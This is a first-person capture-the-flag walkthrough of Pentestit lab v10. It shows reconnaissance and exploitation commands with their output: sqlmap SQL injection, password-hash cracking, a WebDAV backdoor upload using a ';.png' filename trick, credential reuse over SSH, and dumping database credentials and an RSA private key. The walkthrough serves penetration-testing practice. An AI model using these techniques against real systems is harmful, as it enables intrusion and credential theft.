This time, I'm dealing with a network of hosts. Pentestit lab v10 to be exact. The network diagram looks pretty interesting.
After having connected to the vpn. I can only see the gateway to begin with. Let's start by checking out what kind of services are exposed.
root@kali:~/Documents/pentestit# nmap -A -sV -p- -n -Pn -oA gwscan 192.168.101.9
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:33 EET
Nmap scan report for 192.168.101.9
Host is up (0.064s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey:
| 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_ 256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp open smtp CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp open http nginx 1.10.1
|_http-server-header: nginx/1.10.1
|_http-title: 403 Forbidden
443/tcp open http nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open http CommuniGate Pro httpd 6.0.9
| http-methods:
|_ Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-server-header: CommuniGatePro/6.0.9
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: CommuniGate Pro gds.lab Entrance
| http-webdav-scan:
| Server Date: Fri, 03 Feb 2017 08:35:23 GMT
| WebDAV type: Unkown
| Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Server Type: CommuniGatePro/6.0.9
| Directory Listing:
| /
| /CalDAV/
| /CalDAV/INBOX/
| /CalDAV/Outbox/
| /WebDAV/private/caldav/
|_ /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.5 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.2.0 (90%), Linux 3.8 (89%), Linux 3.1 - 3.2 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.0 - 3.2 (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 65.49 ms 10.10.0.1
2 66.25 ms 172.0.1.1
3 66.00 ms 192.168.101.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.09 seconds
Looking good so far. Let's start looking around. I check out that webserver first.
Ok that looks kind of wrong. Javascript and templates seem to not have loaded. However burps shows something interesting.
So we need a hostname for it to work properly. I added "store.gds.lab" point at 192.168.101.9 in my /etc/hosts and try again.
Now that's more like it. An eshop running opencart, I'll dig deeper here later.
Let's look around a bit more. So for the domain "gds.lab" we have subdomain "store" which is the name of one of the machines. Let's check if there is a dns server available.
root@kali:~/Documents/pentestit# nmap -A -sU -p53 -n -Pn -oA gwscan 192.168.101.9
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:51 EET
Nmap scan report for 192.168.101.9
Host is up (0.069s latency).
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND (Fake version: 9.8.4-rpz2+rl005.12-P1)
| dns-nsid:
|_ bind.version: 9.8.4-rpz2+rl005.12-P1
Too many fingerprints match this host to give specific OS details
So the DNS server is there. I just add the names of the other machines in a text file called "names" and look for records of those with a for loop.
root@kali:~/Documents/pentestit# cat names
cloud
ssh
mail
dev-store
store
site
ssh-test
WIN-DC0
blog
web-control
hall-of-fame
captcha
news
WIN-TERM
root@kali:~/Documents/pentestit# for line in $(< names)
> do
> host -t a $line.gds.lab 192.168.101.9
> done
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
cloud.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host ssh.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host mail.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host dev-store.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
store.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host site.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host ssh-test.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host WIN-DC0.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host blog.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host web-control.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host hall-of-fame.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host captcha.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host news.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases:
Host WIN-TERM.gds.lab not found: 3(NXDOMAIN)
From the output of this loop I know that cloud.gds.lab is also valid.
A local owncloud installation. Leaving that for the time being. I move over at the other ports. We also have port 443 open. Although when trying to connect...
Ok that's odd. Burp is confused and thinks there is not SSL there. Taking another look at the nmap I notice something
443/tcp open http nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
Indeed it's HTTP not HTTPS. Let's take another look, this time at http://192.168.101.9:443/
There it is. Moving on to other ports. 8100 is the CommuniGate Web UI. I'll probably need some mails to connect to that. Although that blog gives me 2 mails already on the contact page. Noting those down for later.
Other than that, I decide to enumerate users from that smtp port that is open as well. For that I'll be using metasploit's smtp_enum module.
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options
Module options (auxiliary/scanner/smtp/smtp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts.
msf auxiliary(smtp_enum) > set RHOSTS 192.168.101.9
RHOSTS => 192.168.101.9
msf auxiliary(smtp_enum) > run
[*] 192.168.101.9:25 - 192.168.101.9:25 Banner: 220 gds.lab ESMTP CommuniGate Pro 6.0.9 is glad to see you!
[+] 192.168.101.9:25 - 192.168.101.9:25 Users found: postmaster
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So using the default wordlist that comes with the module I was able to identify another email. postmaster@gds.lab. Wrapping it up, I have 3 mails so far.
Scott Locklear - s.locklear@gds.lab
Joshua Wise - j.wise@gds.lab
postmaster@gds.lab
Also, it looks like they are using their own Pronto version. Looking a bit closer to the app download links, the android app is located in a subdirectory called "gds.lab".
Grabbing a copy of that, it might be interesting later on.
root@kali:~/Documents/pentestit# wget http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
--2017-02-03 12:38:59-- http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
Connecting to 192.168.101.9:8100... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2362437 (2.3M) [application/vnd.android.package-archive]
Saving to: ‘pronto.apk’
pronto.apk 100%[==================================>] 2.25M 127KB/s in 8.5s
2017-02-03 12:39:08 (271 KB/s) - ‘pronto.apk’ saved [2362437/2362437]
At this point, I leave intruder running on those mails. Using a medium size list of passwords (only using 1 thread in order not to stress the service).
While this is running, I take a closer look at the blog site since that's the one that's custom.
By throwing 1 quote and then 2 quotes on the id parameter of the posts I get the feeling of an injection, though some filtering might be in place. That's true until I try random cases.
The above query doesn't return anything when 2=1 so I'm dealing with a boolean blind sqli. Firing up Sqlmap for this case, and proxying it through Burp for better insight.
root@kali:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --risk=3 --level=5 -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080
...
OUTPUT OMITTED
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 6973=6973-- uwZr
Type: UNION query
Title: Generic UNION query (random number) - 2 columns
Payload: id=-7676') UNION ALL SELECT 8145,CONCAT(0x717a786a71,0x6f4e696e4a516a7159574a4476655147614a73554f4377734a79557845576b565159697a57666b41,0x7162787a71)-- TGyb
---
[16:38:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:38:29] [INFO] testing MySQL
[16:38:29] [INFO] confirming MySQL
[16:38:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
[16:38:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.101.9'
[*] shutting down at 16:38:30
Fine so far. Now let's start grabbing some data. At this point I'm not able to retrieve data with sqlmap and Burp proxy history comes to the rescue to show me why.
Because of the randomcase tamper script, there are cases, that certain strings don't actually get different case and that causes sqlmap to be confused. For example ORD might actually be changed to ORd but OR is still an SQL word and that messes up the data retrieval.
Through Burp and it's match & replace rules I make certain changes.
And now with these in place, I'm able to retrieve data.
root@kali:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 --dbs
...
OUTPUT OMITTED
...
available databases [2]:
[*] `information_schema`
[*] site
At this point, bruteforcing the mail has finished and nothing has come up.
Focusing on the sqli, by retriving --is-dba, --current-user and --current-db I know that the user I'm using is not privileged, and it's a simple "user@localhost" account. Also, the current databse is "site", so I'm dumping the contents to see what I can find.
Database "site" contained 2 tables, "posts" and "users". The first one well, doesn't contain anything interesting other than the content of the site. The second one however...
root@kali:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 -D site --dump
...
OUTPUT OMITTED
...
Database: site
Table: users
[1 entry]
+----+-----------+------------------------------------+
| id | username | password |
+----+-----------+------------------------------------+
| 1 | e.lindsey | $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. |
+----+-----------+------------------------------------+
Next step is, crackin this password. Feeding this into a file and then to john...
root@kali:~/Documents/pentestit# john --wordlist:/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
lindsey123 (e.lindsey)
1g 0:00:00:02 DONE (2017-02-06 11:07) 0.4032g/s 32941p/s 32941c/s 32941C/s linny..lilolilo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
That was easy. So e.lindsey's password is lindsey123. But for what?
First thing I try, is checking if there is some admin interface for this blog since well, I have some kind of credentials for it. Simply throwing /admin on the url is revealing.
That's the admin interface of the "site". Simply trying to log in with the former credentials reveals the first token for the "site" box.
After that, I try logging in the webmail on port 8100 with the account e.lindsey@gds.lab and the password found. And I'm in.
From the "Compose" page I check out the user's address book and I'm able to grab some more emails. Some are on the same domain and some others aren't. The ones on the same domain are:
"Alfred Modlin" - a.modlin@gds.lab
"Emanuel Lindsey" - e.lindsey@gds.lab
"none" - e.vasilyev@gds.lab
"Joshua Wise" - j.wise@gds.lab
"Scott Locklear" - s.locklear@gds.lab
And the ones not on that domain are:
"Anna Byrns" - a.byrns@mail.g-security.lab
"Alex Fox" - a.fox@s-lab.test
"Amy Lock" - a.lock@mail.g-security.lab
"B. Trokin" - b.trokin@s-lab.test
"Dean Rivers" - d.rivers@mail.g-security.lab
"Emanuel Lindsey" - e.lindsey@mail.g-security.lab
"E. Vasilyev" - e.vasilyev@s-lab.test
"Harry Farris" - h.farris@mail.g-security.lab
"Jerry Burris" - j.burris@mail.g-security.lab
"Martin Ismail" - m.ismail@mail.g-security.lab
"Michael Minter" - m.minter@mail.g-security.lab
"M. Sopov" - m.sopov@s-lab.test
"Micheal Wessel" - m.wessel@mail.g-security.lab
"none" - managers@mail.g-security.lab
"none" - pbx@mail.g-security.lab
"none" - postmaster@mail.g-security.lab
"Raymond Black" - r.black@mail.g-security.lab
"Ron Dossett" - r.dossett@mail.g-security.lab
"Sara Ramos" - s.ramos@mail.g-security.lab
"Vivian Nix" - v.nix@mail.g-security.lab
"Wm Moran" - w.moran@mail.g-security.lab
"Wilfred Phillips" - w.phillips@mail.g-security.lab
Plus, 2 more domains other the the one already known "gds.lab". "mail.g-security.lab" and "s-lab.test". Both of which result in a refuse from the dns server when I ask for them externally.
root@kali:~/Documents/pentestit# nslookup mail.g-security.lab 192.168.101.9
Server: 192.168.101.9
Address: 192.168.101.9#53
** server can't find mail.g-security.lab: REFUSED
root@kali:~/Documents/pentestit# nslookup s-lab.test 192.168.101.9
Server: 192.168.101.9
Address: 192.168.101.9#53
** server can't find s-lab.test: REFUSED
With those credentials, I try to see if I can get any serverside execution by uploading files to the WebDAV but the server does not support execution even though I tried using the chexec functionality.
root@kali:~/Documents/pentestit/scans# davtest -url http://192.168.101.9:8100/WebDAV/ -auth e.lindsey:lindsey123 --uploadfile ../simple-backdoor.php\;.png --uploadloc /test.php\;.png
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.101.9:8100/WebDAV
********************************************************
unless Uploading file
Upload succeeded: http://192.168.101.9:8100/WebDAV//test.php;.png
Can't find anything else in Communigate web ui for the time being, with this user at least. Let's see however if these credentials are good anywhere else.
root@kali:~/Documents/pentestit# ssh e.lindsey@192.168.101.9
e.lindsey@192.168.101.9's password:
Linux tl10-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.82-1 x86_64
Last login: Mon Feb 6 13:23:16 2017 from 10.10.37.34
e.lindsey@tl10-ssh:~$
The credentials were good for ssh. Now it's time to enumerate this box. I'll just use
LinEnum.sh.
e.lindsey@tl10-ssh:/tmp$ ./.linenum.sh -t > .enumed.txt
root@kali:~/Documents/pentestit# scp e.lindsey@192.168.101.9:/tmp/.enumed.txt ./enumed.txt
e.lindsey@192.168.101.9's password:
.enumed.txt 100% 30KB 195.6KB/s 00:00
From inside the /tmp folder since I don't have permissions to write in e.lindsey's directory, I run the script, dump the output in a file, and then just grab the file with the results with scp locally.
From the results, the IP of the box points to the fact that I am in the box called SSH (IP: 172.16.0.8) so I know where my foothold is.
[00;31mNetwork & IP info: [00m
eth0 Link encap:Ethernet HWaddr 08:00:27:a5:fa:cf
inet addr:172.16.0.8 Bcast:172.16.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fea5:facf/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:377921 errors:0 dropped:0 overruns:0 frame:0
TX packets:448123 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:113776859 (108.5 MiB) TX bytes:121521451 (115.8 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1476 (1.4 KiB) TX bytes:1476 (1.4 KiB)
Also, an interesting thing is the listening ports ofthe machine.
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.8:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.8:22 10.10.178.222:56132 ESTABLISHED -
tcp 0 0 172.16.0.8:22 10.10.37.34:39974 ESTABLISHED -
tcp 0 0 172.16.0.8:22 10.10.143.66:60110 ESTABLISHED -
tcp 0 0 172.16.0.8:22 10.10.112.246:58454 ESTABLISHED -
tcp 0 0 172.16.0.8:22 10.10.224.130:59736 ESTABLISHED -
tcp 0 1 172.16.0.8:49962 54.246.133.196:443 SYN_SENT 8195/python
tcp 0 0 172.16.0.8:22 10.10.178.222:56202 ESTABLISHED -
tcp 0 1 172.16.0.8:49946 54.246.133.196:443 SYN_SENT 8195/python
tcp6 0 0 ::1:953 :::* LISTEN -
From that, I can make out that there is a webserver running on the box. While browsing through the results, I also notice the following:
[00;31mFiles not owned by user but writable by group: [00m
-rwxrwxrwx 1 root root 1192 Oct 6 15:51 /opt/upload/admin/config.php
-rwxrwxrwx 1 root root 1027 Oct 6 15:51 /opt/upload/config.php
-rwxrwxrwx 1 root root 1098 Oct 19 17:58 /var/www/admin/config.php
-rwxrwxrwx 1 root root 946 Oct 19 17:38 /var/www/config.php
-rwxrwxrwx 1 www-data adm 4297 Nov 27 06:12 /var/log/nginx/error.log.1
Some very interesting files are accessible. These files seem to be the config files of Opencart, including db credentials, local folder structure of the store etc. This could be some kind of local installation of the store only accessible from within the network for whatever purposes.
<?php
// HTTP
define('HTTP_SERVER', 'http://store.gds.lab/admin/');
define('HTTP_CATALOG', 'http://store.gds.lab/');
// HTTPS
define('HTTPS_SERVER', 'http://store.gds.lab/admin/');
define('HTTPS_CATALOG', 'http://store.gds.lab/');
// DIR
define('DIR_APPLICATION', '/var/www/admin/');
define('DIR_SYSTEM', '/var/www/system/');
define('DIR_IMAGE', '/var/www/image/');
define('DIR_LANGUAGE', '/var/www/admin/language/');
define('DIR_TEMPLATE', '/var/www/admin/view/template/');
define('DIR_CONFIG', '/var/www/system/config/');
define('DIR_CACHE', '/var/www/system/storage/cache/');
define('DIR_DOWNLOAD', '/var/www/system/storage/download/');
define('DIR_LOGS', '/var/www/system/storage/logs/');
define('DIR_MODIFICATION', '/var/www/system/storage/modification/');
define('DIR_UPLOAD', '/var/www/system/storage/upload/');
define('DIR_CATALOG', '/var/www/catalog/');
// DB
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'dbuser');
define('DB_PASSWORD', 'dfs8g^Ehsd');
define('DB_DATABASE', 'testlab');
define('DB_PORT', '3306');
define('DB_PREFIX', 'oc_');
Now having the database credentials for the application, I log into the database, and start looking for other credentials or anything useful.
e.lindsey@tl10-ssh:/var/www$ mysql -u dbuser -h localhost -D testlab -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.53-0+deb7u1 (Debian)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT user_id,username,password,salt,firstname,lastname,email FROM oc_user;
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
| user_id | username | password | salt | firstname | lastname | email |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
| 1 | admin | 652995927a552617aeed8ecf844b6f6af4760a15 | J3Wgm5mbC | John | Doe | luka@pentestit.ru |
| 2 | admin2 | e2180c9ab794460fe1338bfc28b4e8015edb7777 | e9c180b5c | unixdaemons@gmail.com | | unixdaemons@gmail.com |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
Next step putting these in a file, and feeding that file to john to see if it comes up with anything. Also I'll have to use a custom opencart format because opencart uses its own hashing function according to
this.
root@kali:~/Documents/pentestit# cat opencarthashes
admin:652995927a552617aeed8ecf844b6f6af4760a15$J3Wgm5mbC
admin2:e2180c9ab794460fe1338bfc28b4e8015edb7777$e9c180b5c
root@kali:~/Documents/pentestit# ../../Tools/JohnTheRipper/run/john -form=dynamic='sha1($s.sha1($s.sha1($p)))' opencarthashes --wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (dynamic=sha1($s.sha1($s.sha1($p))) [128/128 AVX 4x1])
Press 'q' or Ctrl-C to abort, almost any other key for status
admin (admin2)
1g 0:00:00:06 DONE (2017-02-06 18:03) 0.1610g/s 2309Kp/s 2313Kc/s 2313KC/s !(3(r3@m.. * 7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
At this point I take a step back to look a bit at the box and its filesystem. While browsing, I find the following directory.
e.lindsey@tl10-ssh:/tmp$ cd /data
e.lindsey@tl10-ssh:/data$ ls
users
e.lindsey@tl10-ssh:/data$ cd users
e.lindsey@tl10-ssh:/data/users$ ls
ls: cannot open directory .: Permission denied
e.lindsey@tl10-ssh:/data/users$
From the looks of it, I cannot access the directory, or more specifically I cannot see its contents. Time for a bit of bruteforce. Keeping in mind that the immediate folder is that of a user, and then some other folder, I write the following script to automate the process.
import os
from string import ascii_lowercase
from itertools import product
for X in range(1,5,1):
keywords = [''.join(i) for i in product(ascii_lowercase, repeat = X)]
users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']
for user in users:
for word in keywords:
if os.path.exists(os.path.join('/data/users', user, word)):
print os.path.join('/data/users', user, word)
I run this little script and soon enough some valid directories start poping up.
e.lindsey@tl10-ssh:/tmp/.test$ python dirfinder.py
/data/users/a.modlin/tmp
/data/users/rross/tmp
/data/users/s.locklear/tmp
/data/users/a.modlin/docs
/data/users/rross/docs
/data/users/s.locklear/docs
Looking into these folders one by one. At some point I find the following.
e.lindsey@tl10-ssh:/tmp/.test$ cd /data/users/rross
e.lindsey@tl10-ssh:/data/users/rross$ cd docs
e.lindsey@tl10-ssh:/data/users/rross/docs$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 25 15:43 .
drwxr-x--x 4 root root 4096 Nov 25 15:15 ..
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root 9 Nov 25 15:43 token.txt
e.lindsey@tl10-ssh:/data/users/rross/docs$ cat token.txt
miaM3aib
e.lindsey@tl10-ssh:/data/users/rross/docs$ cat keys
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA5bsYzXHoflSg3IDa7BxzYphi+hVtAiL40Oj4WaMLG0gmLF2/
pnTwUTuUhrLty0w+D9Da77IEYs2BDe+/rZ2RGqRVk6c2emogsNPzBjGZDGLQ24dp
B62dSGRKubOz4SwIW/Urp7F/is0YJuqT57drNr4QgbaV5J3BZhLTXj8Vhja4GKAM
lhinuP1M57Khu6AxoOWn3BwATexSVRTUtWnS4UMH5eQImUoSOkCculZzjm4eVtN+
TK1MU3rJK0gi6vO6rewqQIIR4HFqJp9NQy8DVAGAEMx5VaXE3aMbdJ6J8QRDbwtu
oLi/jgloQmEzSXEkF1juHTVc7oAAlgiLmP5AYQIDAQABAoIBAFu/03IJsi7yIaSv
Gb/+xN51ueHjOLwHt5PH15gFE+R7djN15ZrXTTtELld1kp8E/ixW33mngTTsmkQ0
ojr2mQMo6ryjpZBSXmgA3ih1Gojl1kA23m2gmxZUZ7uu14JwkY4YZqz8qNGIg8LX
IOcETB963SDRCSBbGOhpUF1tmG0XH8scSyk/CWwqD1Bo5JTOBTBxw0rkPtGUm2u+
UxqLscdoDbMpYncyj050yxY29vThNtkwzLBR8nDY0NdYh6ADAF7xUfBMrMN3Yucm
F2NH1XwVM6qX9Kn4vjJIWssEKddU3Kb/wrl8/ZhFtBX0UnV1y3Ca8sVrRywSb/0b
XMqhwPkCgYEA9Qi2hpSDbIKHXfbLa7VvFUdssLbGYkvuXyxZ/c/H8t91ZQjM99DQ
E+P+fvLrnGylZ8rFRZhbshpU8wLvau2WpNPC6+1KyY4NdhDH5s4IXGxurtYrc0a2
rwFY6QUyWm2ZPA0tpF1jGIr2UXhl2eUAK+9vLB6UX8BdlhL+V6QQnHcCgYEA8AMP
PDSd3vMOon2RMJvPouhl+U+NbcBjgLi0RzDChRMs6K+ZaCN8VgBN9Jel3X2uiubS
6ZtQJb81liawoz/TvbWGj/Bdv9cw+Qx2NsXodXRFnGVLzUq4J8TKjGJ7sHyQkTuZ
qRMeV3uKXvRPB1+gb6IM+XKWnZwNwjXHV9UYt+cCgYEA3y8heXFaR4KYo7h/zkpC
tKIK2OaRycSZiOyPx0PzPj/U4MLkVrBGZmebTawbeK3o9qHVjy9YDeA4EeRRiBaB
yP3spBHNtcoCbtCYE50ENpK5OdxvVR9KlBppDk2icIU1NmJWeUhqU1d3Rfug4ZfY
0SvUGd58jL5dP61rJw6T5r8CgYAfJbZ/cLCgM1jN24/RCBdtI83ACgPnn1UKam3y
4zALRw7H76nv6tMC8i0rtdZvpRTWr9flOyOukl7o6oJ33Rukff9FhMMV115io6xf
tVVSkNFL15V7wdueRZqnl0xH/hJg1qQ9Xd7NKZoucnQjF9ThR915LdbAA3WBo6sI
Cf6YNwKBgAEicsYcWJmP31LMGpSkkayG4pQweRaB6900uLWuW+7erfmsXH3uhVBs
UlxuCP4KXPH0yyoWCx8NwXlieJ4yvDpaAbpc2dWsnEXsAfCvE/6ahXkQs3zEtFLP
6uOrc07P/Fg7x3Tfp1yUK51AkqPk/k7drRHlDKj6UZJt3yduhtKD
-----END RSA PRIVATE KEY-----
Another token - "ssh" box down! And a private key. Grabbing a copy of that too locally. So I know have a private ssh key for rross (probably) I'm thinking about focusing on the "ssh-test" box.
I start by nmaping that host from the box that I'm already in.
e.lindsey@tl10-ssh:/tmp/.test$ nmap -A -sV -v -Pn -p- -n -oA ssh-test 172.16.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:16 MSK
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Connect Scan at 18:16
Scanning 172.16.0.1 [65535 ports]
Discovered open port 1392/tcp on 172.16.0.1
Completed Connect Scan at 18:16, 4.09s elapsed (65535 total ports)
Initiating Service scan at 18:16
Scanning 1 service on 172.16.0.1
Completed Service scan at 18:16, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.0.1.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.03s elapsed
Nmap scan report for 172.16.0.1
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
1392/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
NSE: Script Post-scanning.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds
Although I can't seem to connect via SSH. I decide to check with netcat.
e.lindsey@tl10-ssh:/tmp/.test$ nc -nvv 172.16.0.1 1392
(UNKNOWN) [172.16.0.1] 1392 (?) : Connection refused
sent 0, rcvd 0
Running nmap again.
e.lindsey@tl10-ssh:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:32 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00034s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
